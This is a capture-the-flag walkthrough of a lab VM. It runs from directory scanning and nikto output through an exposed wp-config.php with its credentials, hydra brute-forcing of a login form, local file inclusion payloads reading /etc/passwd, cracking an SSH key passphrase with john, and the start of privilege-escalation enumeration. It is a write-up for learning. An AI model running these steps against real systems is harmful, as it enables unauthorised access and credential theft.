==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/includes/              
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/js/                    
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/maint/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/network/               
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/user/                  
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-content/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/themes/              
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/certificates/       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/css/                
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/customize/          
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/fonts/              
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/widgets/            
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/css/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/                      
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/images/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/includes/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/js/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/js/widgets/                      
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/maint/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/network/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/user/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-content/plugins/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/plugins/akismet/               
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-content/themes/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/certificates/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/css/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/customize/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/fonts/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/images/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/images/crystal/               
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/images/media/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/images/smilies/               
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/crop/                      
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/jquery/                    
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/swfupload/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/thickbox/                  
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/                   
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/widgets/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/            
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/images/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/includes/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/js/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/js/widgets/            
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/maint/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/network/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/user/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/     
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-content/themes/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/certificates/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/css/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/customize/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/fonts/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/crystal/     
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/media/       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/smilies/     
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/crop/            
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/jquery/          
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/swfupload/       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/thickbox/        
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-includes/js/tinymce/         
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/widgets/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/css/colors/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/blue/                 
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/coffee/               
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/light/                
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/midnight/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/ocean/                
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-admin/css/colors/sunrise/              
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-admin/js/widgets/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-content/plugins/akismet/ ----
+ http://192.168.2.24:7654/apache/wp-content/plugins/akismet/.htaccess (CODE:200|SIZE:629)
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/plugins/akismet/_inc/          
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-content/plugins/akismet/views/         
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/images/crystal/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/images/media/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/images/smilies/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/crop/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/jquery/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/jquery/ui/                 
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/swfupload/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/thickbox/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/langs/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/plugins/           
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/skins/             
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/themes/            
==> DIRECTORY: http://192.168.2.24:7654/apache/wp-includes/js/tinymce/utils/             
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/ ----
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/blue/       
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/coffee/     
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/light/      
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/midnight/   
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/ocean/      
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-admin/css/colors/sunrise/    
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-admin/js/widgets/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/ ----
+ http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/.htaccess (CODE:200|SIZE:629)
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/_inc/
==> DIRECTORY: http://192.168.2.24:7654/apache/wordpress/wp-content/plugins/akismet/views/
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/crystal/ ----
                                                                                         
---- Entering directory: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/media/ ----
^C> Testing: http://192.168.2.24:7654/apache/wordpress/wp-includes/images/media/new1

$ curl http://192.168.2.24:7654/apache/.htaccess         

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

$ nikto --host 192.168.2.24 --port 7654 --root /apache
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.24
+ Target Hostname:    192.168.2.24
+ Target Port:        7654
+ Target Path:        /apache
+ Start Time:         2021-03-01 16:10:01 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3093: /apache/.htaccess: Contains configuration and/or authorization information
+ OSVDB-3092: /apache/xmlrpc.php: xmlrpc.php was found.
+ /apache/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ OSVDB-3092: /apache/license.txt: License file found may identify site software.
+ /apache/wp-login.php: Wordpress login found
+ 7917 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2021-03-01 16:10:13 (GMT-5) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

It honestly seems like this is the same content as on port 80 for the most part? Except, there’s a .htacess to let us download index.php files?

$ curl http://192.168.2.24:7654/apache/index.php                                                                                              130 ⨯
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

Let’s take a closer look at that .htaccess gift:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
  • mod_rewrite is on
  • ReWriteBase - ‘Sets the base URL for per-directory rewrites’
  • RewriteRule - ‘Defines rules for the rewriting engine’ - RewriteRule Pattern Substitution [flags]
  • Pattern is perl regex…
  • Flag [L] - The [L] flag causes mod_rewrite to stop processing the rule set. In most contexts, this means that if the rule matches, no further rules will be processed.
  • The “-” rewrite target tells mod_rewrite to pass the request through unchanged.

This, is the default wordpress .htaccess. So, this is rather insignificant. However, we’ve gained what seems like an arbitrary file read? Soooo maybe…

$ curl http://192.168.2.24:7654/apache/wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'pwp_db');

/** MySQL database username */
define('DB_USER', 'pinkywp');

/** MySQL database password */
define('DB_PASSWORD', 'pinkydbpass_wp');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'S`^)1zOBZz`[email protected]}-y+9tG{m%[email protected])57(9Z)[email protected])@ACl_^[Tn2t*');
define('SECURE_AUTH_KEY',  'q)pPWTEBJ^_:)Q*TzNqBuXU-.1xRw:*bPZAR!L0/~wNcIa,[email protected]*s%fxT%u');
define('LOGGED_IN_KEY',    ' j?DW4M#v7ylAkQXec(/a]3XGA#broCltUdHx~iv1~I!-Y-Q!2jKpfaY=bp`&>dZ');
define('NONCE_KEY',        ':O~9!2,Pmq[KchnaftX8->[email protected]~fvi]v2WHZ|) /%njnNUQZ [email protected]{;gL');
define('AUTH_SALT',        'RG3oF>$b_0wA>[[N>{5|Kv=Q5s.PjvPsgG9(Uz?cLXi0:f`H;1:P%E=LdWVK}BIa');
define('SECURE_AUTH_SALT', '2^T8  nU>LG)6&7bp<[email protected]``}T#G^[email protected]]Zlc=qt60Uj^?}$-/Ru8en2;lz|s');
define('LOGGED_IN_SALT',   '4E)(%qnp+U39z%:332(kZ+:+3Obk{@A Q5MVtH-s]L!R!Q8yJ=03N$a,:[email protected];d=PD');
define('NONCE_SALT',       '9CF8=cB0N>Pbv NFeb1&]YbIV/%5h3KC&evIi~.d.Z^bprF7ldger$& j;,K)vBd');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
	define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

Okay, we’ve found a database password! I wonder if it’ll work to login via ssh?

$ ssh [email protected] -p 4655
... nope ...

Alright… I’m not really finding anything that looks like a juicy attack surface though. I don’t find the idea of bruteforcing the known-username with the known hashes attractive.

I was poking around in the browser trying to figure out the nginx config, when I decided to change the IP to the hostname, and at root of the new webserver I get a link to a login page!

curl pinkydb:7654    
<html>
	<head>
		<title>Pinkys Database</title>
	</head>
	<body>
		<center><a href="http://pinkydb:7654/login.php">Login</a>
	</body>

10

Oh yes, now this looks like something we can attack!

Exploitation

I re-ran nikto using this:

$ nikto --host pinkydb --port 7654                      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.24
+ Target Hostname:    pinkydb
+ Target Port:        7654
+ Start Time:         2021-03-01 17:02:08 (GMT-5)
---------------------------------------------------------------------------
+ Server: nginx/1.10.3
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /login.php: Admin login page/section found.
+ 7683 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2021-03-01 17:02:25 (GMT-5) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

$ curl -v pinkydb:7654/config.php
*   Trying 192.168.2.24:7654...
* Connected to pinkydb (192.168.2.24) port 7654 (#0)
> GET /config.php HTTP/1.1
> Host: pinkydb:7654
> User-Agent: curl/7.74.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Server: nginx/1.10.3
< Date: Mon, 01 Mar 2021 22:03:02 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< 
* Connection #0 to host pinkydb left intact

First, I tried the database account from the wp-config.php file on that login page… to no avail.

I tried sql injection here for quite some time… to no avail.

Alright, well let’s see if we can brute-force this then.

I think the username is either:
- pinky1337
- pinkydb
- pinky

Now, let’s take a moment to consider the password we’ve already seen… there may be a pattern here we can leverage. pinkydbpass_wp for wordpress. Eh, probably not overly useful.

Maybe the password is pinkydbpass or pinkydbpass_pinkydb? I tried, no luck.

Okay well, While I think I’ll kickoff an attempt with hydra using a common wordlist…

# Make user list
$ cat users.txt                   
pinky123
pinkydb
pinky
# Run hydra
$ hydra -L users.txt -P /usr/share/wordlists/metasploit/common_roots.txt -s 7654 pinkydb http-post-form  "/login.php:user=^USER^&pass=^PASS^:Invalid"
# Result edited in afterwards
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 17:27:02
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14175 login tries (l:3/p:4725), ~886 tries per task
[DATA] attacking http-post-form://pinkydb:7654/login.php:user=^USER^&pass=^PASS^:Invalid
[STATUS] 4481.00 tries/min, 4481 tries in 00:01h, 9694 to do in 00:03h, 16 active
[STATUS] 4561.00 tries/min, 9122 tries in 00:02h, 5053 to do in 00:02h, 16 active
[STATUS] 4586.00 tries/min, 13758 tries in 00:03h, 417 to do in 00:01h, 16 active
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 17:30:17

Alright, in the meantime, what else can we do… We have some samples of text the user has written, it’s a longshot but we could craft a wordlist from that too.

$ cewl pinkydb > pass.txt
$  hydra -L users.txt -P pass.txt -s 7654 pinkydb http-post-form  "/login.php:user=^USER^&pass=^PASS^:Invalid"
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-03-01 17:31:45
[DATA] max 16 tasks per 1 server, overall 16 tasks, 504 login tries (l:3/p:168), ~32 tries per task
[DATA] attacking http-post-form://pinkydb:7654/login.php:user=^USER^&pass=^PASS^:Invalid
[7654][http-post-form] host: pinkydb   login: pinky   password: Passione
[7654][http-post-form] host: pinkydb   login: pinky123   password: CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)
[7654][http-post-form] host: pinkydb   login: pinkydb   password: CeWL 5.4.8 (Inclusion) Robin Wood ([email protected]) (https://digi.ninja/)
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-01 17:31:46

Oh shit!!! Obviously I sucked at making the cewl list, but the first one must’ve created a session? Let’s go try ourselves:
11

#Notes
- Stefano
- Intern Web developer
- Created RSA key for security for him to login

I downloaded the RSA key…

$ ssh [email protected] -i ./id_rsa -p 4655
Enter passphrase for key './id_rsa': 
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
Permission denied, please try again.
[email protected]'s password: 
[email protected]: Permission denied (publickey,password).

But of course, it has a password! Hmmm…

Well, here’s the available URL’s at this little webapp:
- http://pinkydb:7654/pageegap.php?1337=filesselif1001.php
- http://pinkydb:7654/credentialsdir1425364865/notes.txt
- http://pinkydb:7654/credentialsdir1425364865/id_rsa

The first one looks like we should be able to get LFI right? I tried:
- =../etc/passwd
- =../../etc/passwd
- =../../../etc/passwd
- =../../../../etc/passwd
- =/etc/passwd

12

Okay sweet now we can read any file on the server, and we’ve got a user list! But, this actually still doesn’t help us get a shell directly…

What if we just try to crack the password on that key? Maybe it’s really weak?
I’ve never tried this before so, quick search:
- https://null-byte.wonderhowto.com/how-to/crack-ssh-private-key-passwords-with-john-ripper-0302810/
- ‘in Kali you ’ll find it there /usr/share/john/ssh2john.py.’

$ python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash

I dropped the hash into crackstation… and it doesn’t like the format, oh well let’s try the suggeted method first:

$ john --wordlist=/usr/share/wordlists/rockyou.txt  id_rsa.hash 
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
secretz101       (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:02 DONE (2021-03-01 18:02) 0.4672g/s 6701Kp/s 6701Kc/s 6701KC/sa6_123..*7¡Vamos!
Session completed

Nice!!!

Now we should be able to ssh:

$ ssh [email protected] -i ./id_rsa -p 4655
Enter passphrase for key './id_rsa': 
Linux Pinkys-Palace 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 17 21:18:01 2018 from 172.19.19.2
[email protected]:~$ id
uid=1002(stefano) gid=1002(stefano) groups=1002(stefano)

Wohoo!!

Post-Exploitation

Alright, let’s poke around shall we?!

[email protected]:~$ ls -al
total 32
drwxr-xr-x 4 stefano stefano 4096 Mar 17  2018 .
drwxr-xr-x 5 root    root    4096 Mar 17  2018 ..
-rw------- 1 stefano stefano  273 Mar 17  2018 .bash_history
-rw-r--r-- 1 stefano stefano  220 May 15  2017 .bash_logout
-rw-r--r-- 1 stefano stefano 3526 May 15  2017 .bashrc
-rw-r--r-- 1 stefano stefano  675 May 15  2017 .profile
drwx------ 2 stefano stefano 4096 Mar 17  2018 .ssh
drwxr-xr-x 2 stefano stefano 4096 Mar 17  2018 tools
[email protected]:~$ ls -al ./tools/
total 28
drwxr-xr-x 2 stefano stefano   4096 Mar 17  2018 .
drwxr-xr-x 4 stefano stefano   4096 Mar 17  2018 ..
-rw-r--r-- 1 stefano stefano     65 Mar 16  2018 note.txt
-rwsr----x 1 pinky   www-data 13384 Mar 16  2018 qsub
[email protected]:~$ ./tools/qsub 
./tools/qsub <Message>
[email protected]:~$ ./tools/qsub l
[+] Input Password: 

^C
[email protected]:~$ ./tools/qsub l;ls
[+] Input Password: 
^C
[email protected]:~$ ./tools/qsub l;ls
[+] Input Password: ls
[!] Incorrect Password!
tools

[email protected]ce:~/tools$ sudo -l
bash: sudo: command not found

[email protected]:~$ cat .bash_history
ls
cd tools/
lsd
ls
cd /usr/local/bin
ls
ls -al
cat backup.sh 
cd /home
ls -al
cd pinky/
cd demon/
cd /daemon/
cd /root
gdb
su
cd t
cd
cd tools/
ls -al
cat qsub
strings qsub 
./qsub 
./qsub Testing./qsub 
env
./qsub Testingenv
su
cleart
env
./qsub Test!
su
ls -al
su pinky

[email protected]:/$ ps -aux | grep root
root          1  0.0  0.3 138900  6672 ?        Ss   12:46   0:00 /sbin/init
root          2  0.0  0.0      0     0 ?        S    12:46   0:00 [kthreadd]
root          3  0.0  0.0      0     0 ?        S    12:46   0:00 [ksoftirqd/0]
root          5  0.0  0.0      0     0 ?        S<   12:46   0:00 [kworker/0:0H]
root          7  0.0  0.0      0     0 ?        S    12:46   0:00 [rcu_sched]
root          8  0.0  0.0      0     0 ?        S    12:46   0:00 [rcu_bh]
root          9  0.0  0.0      0     0 ?        S    12:46   0:00 [migration/0]
root         10  0.0  0.0      0     0 ?        S<   12:46   0:00 [lru-add-drain]
root         11  0.0  0.0      0     0 ?        S    12:46   0:00 [watchdog/0]
root         12  0.0  0.0      0     0 ?        S    12:46   0:00 [cpuhp/0]
root         13  0.0  0.0      0     0 ?        S    12:46   0:00 [cpuhp/1]
root         14  0.0  0.0      0     0 ?        S    12:46   0:00 [watchdog/1]
root         15  0.0  0.0      0     0 ?        S    12:46   0:00 [migration/1]
root         16  0.0  0.0      0     0 ?        S    12:46   0:00 [ksoftirqd/1]
root         18  0.0  0.0      0     0 ?        S<   12:46   0:00 [kworker/1:0H]
root         19  0.0  0.0      0     0 ?        S    12:46   0:00 [kdevtmpfs]
root         20  0.0  0.0      0     0 ?        S<   12:46   0:00 [netns]
root         21  0.0  0.0      0     0 ?        S    12:46   0:00 [khungtaskd]
root         22  0.0  0.0      0     0 ?        S    12:46   0:00 [oom_reaper]
root         23  0.0  0.0      0     0 ?        S<   12:46   0:00 [writeback]
root         24  0.0  0.0      0     0 ?        S    12:46   0:00 [kcompactd0]
root         26  0.0  0.0      0     0 ?        SN   12:46   0:00 [ksmd]
root         27  0.0  0.0      0     0 ?        SN   12:46   0:00 [khugepaged]
root         28  0.0  0.0      0     0 ?        S<   12:46   0:00 [crypto]
root         29  0.0  0.0      0     0 ?        S<   12:46   0:00 [kintegrityd]
root         30  0.0  0.0      0     0 ?        S<   12:46   0:00 [bioset]
root         31  0.0  0.0      0     0 ?        S<   12:46   0:00 [kblockd]
root         32  0.0  0.0      0     0 ?        S<   12:46   0:00 [devfreq_wq]
root         33  0.0  0.0      0     0 ?        S<   12:46   0:00 [watchdogd]
root         34  0.0  0.0      0     0 ?        S    12:46   0:00 [kswapd0]
root         35  0.0  0.0      0     0 ?        S<   12:46   0:00 [vmstat]
root         47  0.0  0.0      0     0 ?        S<   12:46   0:00 [kthrotld]
root         49  0.0  0.0      0     0 ?        S<   12:46   0:00 [ipv6_addrconf]
root         93  0.0  0.0      0     0 ?        S<   12:46   0:00 [ata_sff]
root         94  0.0  0.0      0     0 ?        S    12:46   0:00 [scsi_eh_0]
root         95  0.0  0.0      0     0 ?        S<   12:46   0:00 [scsi_tmf_0]
root         96  0.0  0.0      0     0 ?        S    12:46   0:00 [scsi_eh_1]
root         97  0.0  0.0      0     0 ?        S<   12:46   0:00 [scsi_tmf_1]
root         98  0.0  0.0      0     0 ?        S    12:46   0:00 [kworker/u256:1]
root        100  0.0  0.0      0     0 ?        S<   12:46   0:00 [mpt_poll_0]
root        101  0.0  0.0      0     0 ?        S<   12:46   0:00 [mpt/0]
root        128  0.0  0.0      0     0 ?        S    12:46   0:00 [scsi_eh_2]
root        129  0.0  0.0      0     0 ?        S<   12:46   0:00 [scsi_tmf_2]
root        130  0.0  0.0      0     0 ?        S<   12:46   0:00 [bioset]
root        147  0.0  0.0      0     0 ?        S<   12:46   0:00 [kworker/0:1H]
root        148  0.0  0.0      0     0 ?        S<   12:46   0:00 [kworker/1:1H]
root        181  0.0  0.0      0     0 ?        S    12:46   0:00 [jbd2/sda1-8]
root        182  0.0  0.0      0     0 ?        S<   12:46   0:00 [ext4-rsv-conver]
root        210  0.0  0.2  51188  5440 ?        Ss   12:46   0:00 /lib/systemd/systemd-journald
root        216  0.0  0.0      0     0 ?        S    12:46   0:00 [kauditd]
root        217  0.0  0.0      0     0 ?        S    12:46   0:02 [kworker/0:2]
root        234  0.0  0.2  47576  5584 ?        Ss   12:46   0:00 /lib/systemd/systemd-udevd
root        298  0.0  0.0      0     0 ?        S<   12:46   0:00 [ttm_swap]
root        300  0.0  0.0      0     0 ?        S<   12:46   0:00 [nfit]
root        446  0.0  0.1  29664  2828 ?        Ss   12:46   0:00 /usr/sbin/cron -f
root        447  0.0  0.2  46420  4796 ?        Ss   12:46   0:00 /lib/systemd/systemd-logind
root        450  0.0  0.1 250116  3128 ?        Ssl  12:46   0:00 /usr/sbin/rsyslogd -n
root        466  0.0  1.3 235880 26628 ?        Ss   12:46   0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
root        468  0.0  0.0   4040   988 ?        Ss   12:46   0:00 /daemon/panel
